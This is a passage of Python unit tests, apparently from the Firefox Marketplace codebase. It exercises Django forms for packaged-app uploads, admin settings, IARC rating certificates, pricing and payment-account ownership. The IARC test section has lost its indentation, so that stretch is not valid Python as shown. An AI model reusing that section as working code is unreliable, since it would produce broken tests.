        super(TestPackagedAppForm, self).setUp()
        path = self.packaged_app_path('mozball.zip')
        # Fix: close the file handle after reading instead of leaking it
        # (the original passed a bare open(path).read()).
        with open(path) as fp:
            self.files = {'upload': SimpleUploadedFile('mozball.zip',
                                                       fp.read())}

    def test_not_there(self):
        # Missing upload: form invalid and no FileUpload created.
        form = forms.NewPackagedAppForm({}, {})
        assert not form.is_valid()
        eq_(form.errors['upload'], [u'This field is required.'])
        eq_(form.file_upload, None)

    def test_right_size(self):
        form = forms.NewPackagedAppForm({}, self.files)
        assert form.is_valid(), form.errors
        assert form.file_upload

    def test_too_big(self):
        # max_size of 5 bytes guarantees the fixture zip is rejected.
        form = forms.NewPackagedAppForm({}, self.files, max_size=5)
        assert not form.is_valid()
        validation = json.loads(form.file_upload.validation)
        assert 'messages' in validation, 'No messages in validation.'
        eq_(validation['messages'][0]['message'],
            u'Packaged app too large for submission. Packages must be smaller '
            u'than 5 bytes.')

    def test_origin_exists(self):
        self.app.update(app_domain='app://hy.fr')
        form = forms.NewPackagedAppForm({}, self.files)
        assert not form.is_valid()
        validation = json.loads(form.file_upload.validation)
        eq_(validation['messages'][0]['message'],
            'An app already exists on this domain; only one app per domain is '
            'allowed.')
class TestTransactionFilterForm(amo.tests.TestCase):
    """forms.TransactionFilterForm: validates with full filter data and
    exposes the supplied apps as choices."""

    def setUp(self):
        (app_factory(), app_factory())
        # Need queryset to initialize form.
        self.apps = Webapp.objects.all()
        self.data = {
            'app': self.apps[0].id,
            'transaction_type': 1,
            'transaction_id': 1,
            'date_from_day': '1',
            'date_from_month': '1',
            'date_from_year': '2012',
            'date_to_day': '1',
            'date_to_month': '1',
            'date_to_year': '2013',
        }

    def test_basic(self):
        """Test the form doesn't crap out."""
        form = forms.TransactionFilterForm(self.data, apps=self.apps)
        assert form.is_valid(), form.errors

    def test_app_choices(self):
        """Test app choices."""
        form = forms.TransactionFilterForm(self.data, apps=self.apps)
        for app in self.apps:
            assertion = (app.id, app.name) in form.fields['app'].choices
            assert assertion, '(%s, %s) not in choices' % (app.id, app.name)
class TestAppFormBasic(amo.tests.TestCase):
    """forms.AppFormBasic: basic validation and slug uniqueness."""

    def setUp(self):
        self.data = {
            'slug': 'yolo',
            'manifest_url': 'https://omg.org/yes.webapp',
            'description': 'You Only Live Once'
        }
        self.request = mock.Mock()
        self.request.groups = ()

    def post(self):
        # Bind the form against a freshly created webapp instance.
        self.form = forms.AppFormBasic(
            self.data, instance=Webapp.objects.create(app_slug='yolo'),
            request=self.request)

    def test_success(self):
        self.post()
        eq_(self.form.is_valid(), True, self.form.errors)
        eq_(self.form.errors, {})

    def test_slug_invalid(self):
        # A second app already owns the 'yolo' slug.
        Webapp.objects.create(app_slug='yolo')
        self.post()
        eq_(self.form.is_valid(), False)
        eq_(self.form.errors,
            {'slug': ['This slug is already in use. Please choose another.']})
class TestAppVersionForm(amo.tests.TestCase):
    """forms.AppVersionForm: the publish_immediately field mirrors and
    updates the app's make_public setting — but only for pending versions."""

    def setUp(self):
        self.request = mock.Mock()
        # App with a public 1.0 version and a pending 2.0 version.
        self.app = app_factory(make_public=amo.PUBLIC_IMMEDIATELY,
                               version_kw={'version': '1.0',
                                           'created': self.days_ago(5)})
        version_factory(addon=self.app, version='2.0',
                        file_kw=dict(status=amo.STATUS_PENDING))
        self.app.reload()

    def _get_form(self, version, data=None):
        return forms.AppVersionForm(data, instance=version)

    def test_get_publish(self):
        form = self._get_form(self.app.latest_version)
        eq_(form.fields['publish_immediately'].initial, True)
        self.app.update(make_public=amo.PUBLIC_WAIT)
        self.app.reload()
        form = self._get_form(self.app.latest_version)
        eq_(form.fields['publish_immediately'].initial, False)

    def test_post_publish(self):
        # Using the latest_version, which is pending.
        form = self._get_form(self.app.latest_version,
                              data={'publish_immediately': True})
        eq_(form.is_valid(), True)
        form.save()
        self.app.reload()
        eq_(self.app.make_public, amo.PUBLIC_IMMEDIATELY)
        form = self._get_form(self.app.latest_version,
                              data={'publish_immediately': False})
        eq_(form.is_valid(), True)
        form.save()
        self.app.reload()
        eq_(self.app.make_public, amo.PUBLIC_WAIT)

    def test_post_publish_not_pending(self):
        # Using the current_version, which is public.
        form = self._get_form(self.app.current_version,
                              data={'publish_immediately': False})
        eq_(form.is_valid(), True)
        form.save()
        self.app.reload()
        # Not pending, so make_public must be left untouched.
        eq_(self.app.make_public, amo.PUBLIC_IMMEDIATELY)
class TestAdminSettingsForm(TestAdmin):
    """forms.AdminSettingsForm: reindexing on save, tag add/remove/clear,
    localized banner messages, and banner-region validation/persistence."""

    def setUp(self):
        super(TestAdminSettingsForm, self).setUp()
        self.data = {'position': 1}
        self.user = UserProfile.objects.get(username='admin')
        self.request = RequestFactory()
        self.request.user = self.user
        self.request.groups = ()
        self.kwargs = {'instance': self.webapp, 'request': self.request}

    @mock.patch('mkt.developers.forms.index_webapps.delay')
    def test_reindexed(self, index_webapps_mock):
        # Saving triggers a reindex task for the app.
        form = forms.AdminSettingsForm(self.data, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save(self.webapp)
        index_webapps_mock.assert_called_with([self.webapp.id])

    def test_adding_tags(self):
        self.data.update({'tags': 'tag one, tag two'})
        form = forms.AdminSettingsForm(self.data, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save(self.webapp)
        eq_(self.webapp.tags.count(), 2)
        self.assertSetEqual(
            self.webapp.tags.values_list('tag_text', flat=True),
            ['tag one', 'tag two'])

    def test_removing_tags(self):
        # Tags absent from the submitted list are dropped.
        Tag(tag_text='tag one').save_tag(self.webapp)
        eq_(self.webapp.tags.count(), 1)
        self.data.update({'tags': 'tag two, tag three'})
        form = forms.AdminSettingsForm(self.data, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save(self.webapp)
        eq_(self.webapp.tags.count(), 2)
        self.assertSetEqual(
            self.webapp.tags.values_list('tag_text', flat=True),
            ['tag two', 'tag three'])

    def test_removing_all_tags(self):
        Tag(tag_text='tag one').save_tag(self.webapp)
        eq_(self.webapp.tags.count(), 1)
        self.data.update({'tags': ''})
        form = forms.AdminSettingsForm(self.data, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save(self.webapp)
        eq_(self.webapp.tags.count(), 0)
        self.assertSetEqual(
            self.webapp.tags.values_list('tag_text', flat=True), [])

    def test_banner_message(self):
        # Each locale field maps to a Translation row sharing one id.
        self.data.update({
            'banner_message_en-us': u'Oh Hai.',
            'banner_message_es': u'¿Dónde está la biblioteca?',
        })
        form = forms.AdminSettingsForm(self.data, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save(self.webapp)
        geodata = self.webapp.geodata.reload()
        trans_id = geodata.banner_message_id
        eq_(geodata.banner_message, self.data['banner_message_en-us'])
        eq_(unicode(Translation.objects.get(id=trans_id, locale='es')),
            self.data['banner_message_es'])
        eq_(unicode(Translation.objects.get(id=trans_id, locale='en-us')),
            self.data['banner_message_en-us'])

    def test_banner_regions_garbage(self):
        self.data.update({
            'banner_regions': ['LOL']
        })
        form = forms.AdminSettingsForm(self.data, **self.kwargs)
        assert not form.is_valid(), form.errors

    def test_banner_regions_valid(self):  # Use strings
        self.data.update({
            'banner_regions': [unicode(mkt.regions.BR.id),
                               mkt.regions.SPAIN.id]
        })
        self.webapp.geodata.update(banner_regions=[mkt.regions.RS.id])
        form = forms.AdminSettingsForm(self.data, **self.kwargs)
        eq_(form.initial['banner_regions'], [mkt.regions.RS.id])
        assert form.is_valid(), form.errors
        # String ids are coerced to ints in cleaned_data.
        eq_(form.cleaned_data['banner_regions'], [mkt.regions.BR.id,
                                                  mkt.regions.SPAIN.id])
        form.save(self.webapp)
        geodata = self.webapp.geodata.reload()
        eq_(geodata.banner_regions, [mkt.regions.BR.id, mkt.regions.SPAIN.id])

    def test_banner_regions_initial(self):
        # None and [] both present as an empty initial list.
        form = forms.AdminSettingsForm(self.data, **self.kwargs)
        eq_(self.webapp.geodata.banner_regions, None)
        eq_(form.initial['banner_regions'], [])
        self.webapp.geodata.update(banner_regions=[])
        form = forms.AdminSettingsForm(self.data, **self.kwargs)
        eq_(form.initial['banner_regions'], [])
class TestIARCGetAppInfoForm(amo.tests.WebappTestCase):
    def _get_form(self, app=None, **kwargs):
        """Build an IARCGetAppInfoForm bound to `app` (default: self.app);
        kwargs override the default submission_id/security_code."""
        data = {
            'submission_id': 1,
            'security_code': 'a'
        }
        data.update(kwargs)
        return forms.IARCGetAppInfoForm(data=data, app=app or self.app)
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    def test_good(self, storefront_mock):
        """Saving a valid form creates the IARCInfo record and pushes data
        to the IARC storefront."""
        with self.assertRaises(IARCInfo.DoesNotExist):
            self.app.iarc_info
        form = self._get_form()
        assert form.is_valid(), form.errors
        form.save()
        iarc_info = IARCInfo.objects.get(addon=self.app)
        eq_(iarc_info.submission_id, 1)
        eq_(iarc_info.security_code, 'a')
        assert storefront_mock.called
@mock.patch.object(settings, 'IARC_ALLOW_CERT_REUSE', False)
def test_iarc_cert_reuse_on_self(self):
# Test okay to use on self.
self.app.set_iarc_info(1, 'a')
form = self._get_form()
ok_(form.is_valid())
form.save()
eq_(IARCInfo.objects.count(), 1)
@mock.patch.object(settings, 'IARC_ALLOW_CERT_REUSE', False)
def test_iarc_cert_already_used(self):
# Test okay to use on self.
self.app.set_iarc_info(1, 'a')
eq_(IARCInfo.objects.count(), 1)
some_app = amo.tests.app_factory()
form = self._get_form(app=some_app)
ok_(not form.is_valid())
form = self._get_form(app=some_app, submission_id=2)
ok_(form.is_valid())
@mock.patch.object(settings, 'IARC_ALLOW_CERT_REUSE', True)
def test_iarc_already_used_dev(self):
self.app.set_iarc_info(1, 'a')
form = self._get_form()
ok_(form.is_valid())
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_changing_cert(self, storefront_mock):
self.app.set_iarc_info(1, 'a')
form = self._get_form(submission_id=2, security_code='b')
ok_(form.is_valid(), form.errors)
form.save()
iarc_info = self.app.iarc_info.reload()
eq_(iarc_info.submission_id, 2)
eq_(iarc_info.security_code, 'b')
assert storefront_mock.called
def test_iarc_unexclude(self):
geodata, created = Geodata.objects.get_or_create(addon=self.app)
geodata.update(region_br_iarc_exclude=True,
region_de_iarc_exclude=True)
form = self._get_form()
ok_(form.is_valid())
form.save()
geodata = Geodata.objects.get(addon=self.app)
assert not geodata.region_br_iarc_exclude
assert not geodata.region_de_iarc_exclude
def test_allow_subm(self):
form = self._get_form(submission_id='subm-1231')
assert form.is_valid(), form.errors
form.save()
iarc_info = self.app.iarc_info
eq_(iarc_info.submission_id, 1231)
eq_(iarc_info.security_code, 'a')
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_bad_submission_id(self, storefront_mock):
form = self._get_form(submission_id='subwayeatfresh-133')
assert not form.is_valid()
assert not storefront_mock.called
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_incomplete(self, storefront_mock):
form = self._get_form(submission_id=None)
assert not form.is_valid(), 'Form was expected to be invalid.'
assert not storefront_mock.called
@mock.patch('lib.iarc.utils.IARC_XML_Parser.parse_string')
def test_rating_not_found(self, _mock):
_mock.return_value = {'rows': [
{'ActionStatus': 'No records found. Please try another criteria.'}
]}
form = self._get_form()
assert form.is_valid(), form.errors
with self.assertRaises(django_forms.ValidationError):
form.save()
########NEW FILE########
__FILENAME__ = test_forms_payments
import mock
from curling.lib import HttpClientError
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
from test_utils import RequestFactory
import amo
import amo.tests
from addons.models import Addon, AddonDeviceType, AddonUser
from constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR)
from editors.models import RereviewQueue
from users.models import UserProfile
from mkt.developers import forms_payments, models
from mkt.developers.providers import get_provider
from mkt.developers.tests.test_providers import Patcher
from mkt.developers.tests.test_views_payments import setup_payment_account
from mkt.site.fixtures import fixture
from mkt.prices.models import AddonPremium, Price
class TestPremiumForm(amo.tests.TestCase):
    """Tests for PremiumForm: toggling an app between free and paid,
    price selection, the in-app payments flag, and device-type changes
    (including the re-review rules they trigger).

    None of the tests in this TC should initiate Solitude calls.
    """
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.request = RequestFactory()
        self.request.POST = {'toggle-paid': ''}
        self.addon = Addon.objects.get(pk=337141)
        AddonDeviceType.objects.create(
            addon=self.addon, device_type=amo.DEVICE_GAIA.id)
        # Default submitted platform data; individual tests mutate this.
        self.platforms = {'free_platforms': ['free-firefoxos'],
                          'paid_platforms': ['paid-firefoxos']}
        self.price = Price.objects.create(price='0.99')
        self.user = UserProfile.objects.get(email='[email protected]')
        self.kwargs = {
            'request': self.request,
            'addon': self.addon,
            'user': self.user,
        }

    def test_free_to_premium(self):
        """Going paid makes the app premium and resets it to incomplete."""
        self.request.POST = {'toggle-paid': 'paid'}
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(self.addon.premium_type, amo.ADDON_PREMIUM)
        eq_(self.addon.status, amo.STATUS_NULL)

    def test_free_to_premium_pending(self):
        # Pending apps shouldn't get re-reviewed.
        self.addon.update(status=amo.STATUS_PENDING)
        self.request.POST = {'toggle-paid': 'paid'}
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(RereviewQueue.objects.count(), 0)

    def test_free_with_in_app_requires_in_app(self):
        # Tier zero ('free') without in-app enabled is invalid.
        self.platforms.update(price='free', allow_inapp='False')
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        assert not form.is_valid()

    def test_free_with_in_app(self):
        """Free + in-app is valid and sets ADDON_FREE_INAPP."""
        self.make_premium(self.addon)
        self.platforms.update(price='free', allow_inapp='True')
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        assert form.is_valid()
        form.save()
        eq_(self.addon.premium_type, amo.ADDON_FREE_INAPP)

    def test_tier_zero_inapp_is_optional(self):
        """For a non-zero price tier the in-app flag may be either value."""
        # NOTE: an earlier revision first set price='free' here, but that
        # value was overwritten before use, so it has been removed.
        price = Price.objects.create(price='9.99')
        self.platforms.update(price=price.pk, allow_inapp='True')
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        assert form.is_valid()
        self.platforms.update(price=price.pk, allow_inapp='False')
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        assert form.is_valid()

    def test_premium_to_free(self):
        # Premium to Free is ok for public apps.
        self.make_premium(self.addon)
        self.request.POST = {'toggle-paid': 'free'}
        self.platforms.update(price=self.price.pk)
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(RereviewQueue.objects.count(), 0)
        eq_(self.addon.premium_type, amo.ADDON_FREE)
        eq_(self.addon.status, amo.STATUS_PUBLIC)

    def test_is_paid_premium(self):
        self.make_premium(self.addon)
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        eq_(form.is_paid(), True)

    def test_free_inapp_price_required(self):
        # FREE_INAPP apps must still submit a price value.
        self.addon.update(premium_type=amo.ADDON_FREE_INAPP)
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert not form.is_valid()

    def test_is_paid_premium_inapp(self):
        self.addon.update(premium_type=amo.ADDON_PREMIUM_INAPP)
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        eq_(form.is_paid(), True)

    def test_is_paid_free_inapp(self):
        # Free-with-in-app still counts as "paid" for form purposes.
        self.addon.update(premium_type=amo.ADDON_FREE_INAPP)
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        eq_(form.is_paid(), True)

    def test_not_is_paid_free(self):
        self.addon.update(premium_type=amo.ADDON_FREE)
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        eq_(form.is_paid(), False)

    def test_add_device(self):
        # Adding a device to a pending app does not trigger re-review.
        self.addon.update(status=amo.STATUS_PENDING)
        self.platforms['free_platforms'].append('free-desktop')
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        assert amo.DEVICE_DESKTOP in self.addon.device_types
        eq_(RereviewQueue.objects.count(), 0)
        eq_(self.addon.status, amo.STATUS_PENDING)

    def test_add_device_public_rereview(self):
        # Adding a device to a public app queues a re-review.
        self.addon.update(status=amo.STATUS_PUBLIC)
        self.platforms['free_platforms'].append('free-desktop')
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        assert amo.DEVICE_DESKTOP in self.addon.device_types
        eq_(RereviewQueue.objects.count(), 1)
        eq_(self.addon.status, amo.STATUS_PUBLIC)

    def test_add_device_publicwaiting_rereview(self):
        # Same for apps approved but waiting to be made public.
        self.addon.update(status=amo.STATUS_PUBLIC_WAITING)
        self.platforms['free_platforms'].append('free-desktop')
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        assert amo.DEVICE_DESKTOP in self.addon.device_types
        eq_(RereviewQueue.objects.count(), 1)
        eq_(self.addon.status, amo.STATUS_PUBLIC_WAITING)

    def test_update(self):
        """Changing the price tier updates the stored premium price."""
        self.make_premium(self.addon)
        price = Price.objects.create(price='9.99')
        self.platforms.update(price=price.pk)
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(self.addon.premium.price.pk, price.pk)

    def test_update_wo_initial_price(self):
        """Test that if the app doesn't have an initial price (i.e.: it was
        marked as paid during submission) that this is handled gracefully.
        """
        # Don't give the app an initial price.
        self.addon._premium = AddonPremium.objects.create(addon=self.addon)
        self.addon.premium_type = amo.ADDON_PREMIUM
        price = Price.objects.create(price='9.99')
        self.platforms.update(price=price.pk)
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(self.addon.premium.price.pk, price.pk)

    def test_update_new_with_acct(self):
        # This was the situation for a new app that was getting linked to an
        # existing bank account.
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        self.platforms.update(price=self.price.pk)
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        addon = Addon.objects.get(pk=self.addon.pk)
        assert addon.premium

    def test_update_with_bogus_price(self):
        # A non-numeric price value produces exactly one 'price' error.
        AddonPremium.objects.create(addon=self.addon)
        self.addon.premium_type = amo.ADDON_PREMIUM
        self.platforms.update(price='bogus')
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        eq_(form.is_valid(), False)
        eq_(len(form.errors), 1)
        ok_('price' in form.errors)

    def test_premium_with_empty_price(self):
        AddonPremium.objects.create(addon=self.addon)
        self.addon.premium_type = amo.ADDON_PREMIUM
        self.platforms.update(price='')
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        eq_(form.is_valid(), False)
        eq_(len(form.errors), 1)
        ok_('price' in form.errors)

    def test_premium_with_price_does_not_exist(self):
        AddonPremium.objects.create(addon=self.addon)
        self.addon.premium_type = amo.ADDON_PREMIUM
        self.platforms.update(price=9999)
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        # Even when the choice is offered, a missing Price row must fail.
        form.fields['price'].choices = ((9999, 'foo'),)
        eq_(form.is_valid(), False)
        eq_(len(form.errors), 1)
        ok_('price' in form.errors)

    def test_optgroups_in_price_choices(self):
        """Price choices are grouped into optgroups by billing method."""
        Price.objects.create(price='0.00', method=PAYMENT_METHOD_ALL)
        Price.objects.create(price='0.10', method=PAYMENT_METHOD_OPERATOR)
        Price.objects.create(price='1.00', method=PAYMENT_METHOD_CARD)
        Price.objects.create(price='1.10', method=PAYMENT_METHOD_CARD)
        Price.objects.create(price='1.00', method=PAYMENT_METHOD_ALL)
        Price.objects.create(price='2.00', method=PAYMENT_METHOD_ALL)
        form = forms_payments.PremiumForm(self.platforms, **self.kwargs)
        # 1 x Free with inapp
        # + 1 x price tier 0
        # + 3 x values grouped by billing
        # = 5
        eq_(len(form.fields['price'].choices), 5)
        html = form.as_p()
        eq_(len(pq(html)('#id_price optgroup')), 3, 'Should be 3 optgroups')

    def test_cannot_change_devices_on_toggle(self):
        # While toggling free/paid, device types are kept as-is.
        self.request.POST = {'toggle-paid': 'paid'}
        self.platforms = {'paid_platforms': ['paid-firefoxos']}
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        eq_(self.addon.premium_type, amo.ADDON_PREMIUM)
        eq_(self.addon.status, amo.STATUS_NULL)
        self.assertSetEqual(self.addon.device_types, form.get_devices())

    def test_cannot_set_desktop_for_packaged_app(self):
        self.platforms = {'free_platforms': ['free-desktop']}
        self.addon.update(is_packaged=True)
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert not form.is_valid()

    def test_can_set_desktop_for_packaged_app(self):
        # Allowed when the 'desktop-packaged' waffle flag is on.
        self.create_flag('desktop-packaged')
        self.platforms = {'free_platforms': ['free-desktop']}
        self.addon.update(is_packaged=True)
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors

    def test_can_change_devices_for_hosted_app(self):
        # Specify the free and paid. It shouldn't fail because you can't change
        # payment types without explicitly specifying that.
        self.platforms = {'free_platforms': ['free-desktop'],
                          'paid_platforms': ['paid-firefoxos']}  # Ignored.
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        self.assertSetEqual(self.addon.device_types, [amo.DEVICE_DESKTOP])

    def test_cannot_change_android_devices_for_packaged_app(self):
        self.platforms = {'free_platforms': ['free-android-mobile'],
                          'paid_platforms': ['paid-firefoxos']}  # Ignored.
        self.addon.update(is_packaged=True)
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert not form.is_valid()
        # Devices are untouched on a failed validation.
        self.assertSetEqual(self.addon.device_types, [amo.DEVICE_GAIA])

    def test_can_change_devices_for_packaged_app_behind_flag(self):
        self.create_flag('android-packaged')
        self.platforms = {'free_platforms': ['free-android-mobile'],
                          'paid_platforms': ['paid-firefoxos']}  # Ignored.
        self.addon.update(is_packaged=True)
        form = forms_payments.PremiumForm(data=self.platforms, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        self.assertSetEqual(self.addon.device_types, [amo.DEVICE_MOBILE])

    def test_can_change_devices_for_android_app_behind_flag(self):
        self.create_flag('android-payments')
        data = {'paid_platforms': ['paid-firefoxos', 'paid-android-mobile'],
                'price': 'free', 'allow_inapp': 'True'}
        self.make_premium(self.addon)
        form = forms_payments.PremiumForm(data=data, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        self.assertSetEqual(self.addon.device_types, [amo.DEVICE_MOBILE,
                                                      amo.DEVICE_GAIA])

    def test_initial(self):
        # The initial price id reflects the only active tier from setUp.
        form = forms_payments.PremiumForm(**self.kwargs)
        eq_(form._initial_price_id(), Price.objects.get(price='0.99').pk)

    def test_initial_not_there(self):
        # With no active tiers there is no initial price.
        Price.objects.get(price='0.99').update(active=False)
        form = forms_payments.PremiumForm(**self.kwargs)
        eq_(form._initial_price_id(), None)
class TestAccountListForm(Patcher, amo.tests.TestCase):
    """Tests for AccountListForm: which payment accounts a user may attach
    to an app, depending on app ownership, account sharing, and admin
    status (admins see the field but may not change it)."""

    fixtures = fixture('webapp_337141', 'user_999', 'group_admin',
                       'user_admin', 'user_admin_group', 'prices')

    def setUp(self):
        super(TestAccountListForm, self).setUp()
        self.addon = Addon.objects.get(pk=337141)
        self.addon.update(status=amo.STATUS_NULL,
                          highest_status=amo.STATUS_PUBLIC)
        self.provider = get_provider(name='bango')
        self.price = Price.objects.filter()[0]
        AddonPremium.objects.create(addon=self.addon, price=self.price)
        # self.user owns the webapp fixture; 'other' does not; 'admin' is
        # a site admin who is not an author of the app.
        self.user = UserProfile.objects.get(pk=31337)
        amo.set_user(self.user)
        self.other = UserProfile.objects.get(pk=999)
        self.admin = UserProfile.objects.get(email='[email protected]')
        self.kwargs = {
            'addon': self.addon,
            'provider': self.provider,
        }

    def create_user_account(self, user, **kwargs):
        """Create a user account"""
        seller = models.SolitudeSeller.objects.create(
            resource_uri='/path/to/sel', user=user, uuid='uuid-%s' % user.pk)
        data = dict(user=user, uri='asdf-%s' % user.pk, name='test',
                    inactive=False, solitude_seller=seller,
                    seller_uri='suri-%s' % user.pk, account_id=123,
                    agreed_tos=True, shared=False)
        data.update(**kwargs)
        return models.PaymentAccount.objects.create(**data)

    def make_owner(self, user):
        # Grant `user` the OWNER author role on the app.
        AddonUser.objects.create(addon=self.addon,
                                 user=user, role=amo.AUTHOR_ROLE_OWNER)

    def is_owner(self, user):
        # True when `user` has the OWNER role on the app.
        return (self.addon.authors.filter(pk=user.pk,
                addonuser__role=amo.AUTHOR_ROLE_OWNER).exists())

    def associate_owner_account(self):
        """Attach the owner's payment account to the app; return it."""
        owner_account = self.create_user_account(self.user)
        form = forms_payments.AccountListForm(
            data={'accounts': owner_account.pk}, user=self.user, **self.kwargs)
        assert form.is_valid(), form.errors
        form.save()
        return owner_account

    def test_with_owner_account(self):
        """An owner can select their own account; afterwards the form is
        enabled and pre-populated with that account."""
        user = self.user
        account = self.create_user_account(user)
        assert self.is_owner(user)
        form = forms_payments.AccountListForm(
            data={'accounts': account.pk}, user=user, **self.kwargs)
        eq_(form.current_payment_account, None)
        assert form.is_valid(), form.errors
        form.save()
        form = forms_payments.AccountListForm(None, user=user,
                                              **self.kwargs)
        eq_(form.fields['accounts'].widget.attrs.get('disabled'), None)
        eq_(form.fields['accounts'].empty_label, None)
        eq_(form.initial['accounts'], account)

    def test_with_shared_account(self):
        # Shared accounts of other users appear in the choices.
        account = self.create_user_account(self.user)
        shared = self.create_user_account(self.other, shared=True)
        form = forms_payments.AccountListForm(user=self.user,
                                              **self.kwargs)
        self.assertSetEqual(form.fields['accounts'].queryset,
                            (account, shared))

    def test_set_shared_account(self):
        # A shared account owned by someone else can be attached.
        shared = self.create_user_account(self.other, shared=True)
        form = forms_payments.AccountListForm(
            data={'accounts': shared.pk}, user=self.user, **self.kwargs)
        assert form.is_valid()
        form.save()
        accts = set(a.payment_account.pk for a in
                    self.addon.all_payment_accounts())
        assert shared.pk in accts, 'Unexpected: {a}'.format(a=accts)

    def test_with_non_owner_account(self):
        # Non-owners get a disabled field and cannot submit.
        user = self.other
        account = self.create_user_account(user)
        assert not self.is_owner(user)
        form = forms_payments.AccountListForm(
            data={'accounts': account.pk}, user=user, **self.kwargs)
        eq_(form.current_payment_account, None)
        assert form.fields['accounts'].widget.attrs['disabled'] is not None
        assert not form.is_valid(), form.errors

    def test_with_non_owner_admin_account(self):
        # Admins who aren't owners are treated the same as non-owners.
        user = self.admin
        account = self.create_user_account(user)
        assert not self.is_owner(user)
        form = forms_payments.AccountListForm(
            data={'accounts': account.pk}, user=user, **self.kwargs)
        eq_(form.current_payment_account, None)
        assert form.fields['accounts'].widget.attrs['disabled'] is not None
        assert not form.is_valid(), form.errors

    def test_admin_account_no_data(self):
        # An admin submitting no account data is valid (no-op).
        self.associate_owner_account()
        user = self.admin
        assert not self.is_owner(user)
        form = forms_payments.AccountListForm(
            data={}, user=user, **self.kwargs)
        assert form.fields['accounts'].widget.attrs['disabled'] is not None
        assert form.is_valid(), form.errors

    def test_admin_account_empty_string(self):
        # But explicitly submitting an empty value is rejected.
        self.associate_owner_account()
        user = self.admin
        assert not self.is_owner(user)
        form = forms_payments.AccountListForm(
            data={'accounts': ''}, user=user, **self.kwargs)
        assert form.fields['accounts'].widget.attrs['disabled'] is not None
        assert not form.is_valid(), form.errors

    def test_with_other_owner_account(self):
        # A second owner can also select their own account.
        user = self.other
        account = self.create_user_account(user)
        self.make_owner(user)
        assert self.is_owner(user)
        form = forms_payments.AccountListForm(
            data={'accounts': account.pk}, user=user, **self.kwargs)
        assert form.is_valid(), form.errors
        eq_(form.current_payment_account, None)
        eq_(form.fields['accounts'].widget.attrs.get('disabled'), None)
        form.save()
        form = forms_payments.AccountListForm(None, user=user,
                                              **self.kwargs)
        eq_(form.fields['accounts'].empty_label, None)
        eq_(form.initial['accounts'], account)

    def test_with_non_owner_account_existing_account(self):
        # With an account already attached, non-owners still can't change it.
        owner_account = self.associate_owner_account()
        user = self.other
        account = self.create_user_account(user)
        assert not self.is_owner(user)
        form = forms_payments.AccountListForm(
            data={'accounts': account.pk}, user=user, **self.kwargs)
        assert form.fields['accounts'].widget.attrs['disabled'] is not None
        eq_(form.current_payment_account, owner_account)
        assert not form.is_valid(), form.errors

    def test_with_non_owner_admin_account_existing_account(self):
        owner_account = self.associate_owner_account()
        user = self.admin
        account = self.create_user_account(user)
        assert not self.is_owner(user)
        form = forms_payments.AccountListForm(
            data={'accounts': account.pk}, user=user, **self.kwargs)
        assert form.fields['accounts'].widget.attrs['disabled'] is not None
        eq_(form.current_payment_account, owner_account)
        assert not form.is_valid(), form.errors

    def test_with_other_owner_account_existing_account(self):
        # A co-owner may replace the currently attached account.
        owner_account = self.associate_owner_account()
        user = self.other
        account = self.create_user_account(user)
        self.make_owner(user)
        assert self.is_owner(user)
        form = forms_payments.AccountListForm(
            data={'accounts': account.pk}, user=user, **self.kwargs)
        eq_(form.current_payment_account, owner_account)
        assert form.is_valid(), form.errors
        form.save()
        form = forms_payments.AccountListForm(None, user=user,
                                              **self.kwargs)
        eq_(form.fields['accounts'].empty_label, None)
        eq_(form.initial['accounts'], account)
        assert form.current_payment_account is None
class TestPaidRereview(Patcher, amo.tests.TestCase):
    """Tests that attaching a payment account restores a paid app's
